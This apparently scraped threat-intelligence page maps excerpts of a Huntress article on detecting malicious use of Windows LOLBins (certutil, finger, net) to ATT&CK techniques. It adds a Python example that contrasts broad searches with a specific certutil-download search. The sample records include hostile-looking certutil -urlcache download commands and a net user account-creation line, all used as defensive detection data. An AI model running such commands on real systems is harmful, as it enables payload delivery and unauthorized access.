“…similar to the search for finger.exe, results in 2,182,554 hits, as illustrated in Figure 2. Refining the search to remove a great deal of the legitimate activity requires a good bit of time and effort, where doing specific searches for malicious activity seen by others can im…”
T1059.001 PowerShell (98%)
“…ems) product. This activity was observed as an attempt to install a rogue ScreenConnect instance on the affected endpoints, and was blocked by installed security tools. The resulting command line, across multiple incidents, appears as follows: certutil -urlcache -f [http/h…”
T1059.001 PowerShell (96%)
“…eving command lines from the Windows PowerShell event log Event ID 600 records, the command line shown in Figure 3 invariably stands out as unique. Another example of an “LOLBin” that can be used for both legitimate and malicious purposes is certutil.exe, a command line util…”
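The two certutil excerpts above make one point: a broad search for any execution of a LOLBin (finger.exe, certutil.exe) drowns in legitimate use, while a search for a specific pattern already seen in incidents (certutil -urlcache with a URL, the pattern the article quotes for the rogue ScreenConnect install) surfaces the few records that matter. The following is an added example written for this page, not code from the Huntress article; it runs both searches over a handful of constructed process-creation records (image path plus command line) and returns the counts. The sample records, the `LOLBINS` set and the function names are assumptions made for the illustration.

```python
import re

# Constructed sample of process-creation style records: (image path, command line).
# These lines are made up for this example and are not telemetry from the article.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe", r"certutil -hashfile C:\installer.msi SHA256"),
    (r"C:\Windows\System32\certutil.exe", "certutil -store My"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -urlcache -f http://example.invalid/sc.exe C:\Users\Public\sc.exe"),
    (r"C:\Windows\System32\finger.exe", "finger user@host.example.invalid"),
    (r"C:\Windows\System32\finger.exe", "finger"),
    (r"C:\Windows\System32\net.exe", "net user helpdesk P@ssw0rd /add"),
    # Same download technique, different casing, /-style switch and -split added.
    (r"C:\Windows\System32\certutil.exe",
     "CERTUTIL.EXE  /URLCACHE  -split -f https://example.invalid/a.txt a.txt"),
]

# Assumed watch list of native binaries the excerpts discuss.
LOLBINS = {"certutil.exe", "finger.exe", "net.exe"}


def image_name(image_path):
    """Return the lower-cased file name, splitting on either path separator
    so the logic also runs on a non-Windows host."""
    return re.split(r"[\\/]", image_path)[-1].lower()


def broad_lolbin_hits(events):
    """Broad search: every execution of any binary on the watch list.
    This is the kind of query that returns millions of hits in practice."""
    return [e for e in events if image_name(e[0]) in LOLBINS]


def is_certutil_download(image_path, cmdline):
    """Specific search: certutil invoked with the urlcache switch and a URL
    argument, which is the fetch-a-file-from-the-internet usage.  Switch
    prefix (- or /) and letter case are normalised so trivial variations in
    the command line do not evade the match."""
    if image_name(image_path) != "certutil.exe":
        return False
    tokens = cmdline.split()
    switches = {t.lstrip("-/").lower() for t in tokens if t[:1] in "-/"}
    has_url = any(re.match(r"(?i)^(https?|ftp)://", t) for t in tokens)
    return "urlcache" in switches and has_url


def specific_hits(events):
    return [e for e in events if is_certutil_download(*e)]


def summarize(events):
    """Counts for both strategies, so the difference in triage load is visible."""
    return {"broad": len(broad_lolbin_hits(events)),
            "specific": len(specific_hits(events))}


if __name__ == "__main__":
    print(summarize(SAMPLE_EVENTS))
    for image, cmd in specific_hits(SAMPLE_EVENTS):
        print("certutil download:", cmd)
```

On the constructed sample the broad search returns every record (all seven are LOLBin executions), while the specific search returns only the two certutil download command lines; the legitimate hashfile and cert-store invocations, and both finger runs, are left alone. The same shape of rule can be expressed in whatever query language the EDR or SIEM uses; the point is matching on the switch-plus-URL combination rather than on the binary name.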
T1218 System Binary Proxy Execution (85%)
“Detecting Malicious Use of LOLBins, Pt. II | Huntress. Background: Windows endpoints ship “out of the box” with a great deal of functionality provided through both GUI and command line utilities. These native utilities are often referred to as “living off the land” binaries, or…”
T1218.011 Rundll32 (62%)
“….exe to create and manage user accounts, and how the use of this LOLBin could be used, under different circumstances, as an effective detection of malicious activity. Finger is a client-server application first developed in 1971 to allow users to query other systems on the net…”
T1055.001 Dynamic-link Library Injection (46%)
“Detecting Malicious Use of LOLBins, Pt. II | Huntress. Background: Windows endpoints ship “out of the box” with a great deal of functionality provided through both GUI and command line utilities. These native utilities are often referred to as “living off the land” binaries, or…”
T1218.011 Rundll32 (35%)
“Detecting Malicious Use of LOLBins, Pt. II | Huntress. Background: Windows endpoints ship “out of the box” with a great deal of functionality provided through both GUI and command line utilities. These native utilities are often referred to as “living off the land” binaries, or…”
Summary
Rhetoric within the cybersecurity community has leaned heavily toward the idea that threat actors use LOLBins to “hide amongst the noise” of normal administrative and operational activity. However, as Huntress SOC analysts can attest, this is often far from the case: the malicious invocations tend to use argument combinations that legitimate administrative use of the same binary rarely does, which is what makes targeted searches for those patterns effective.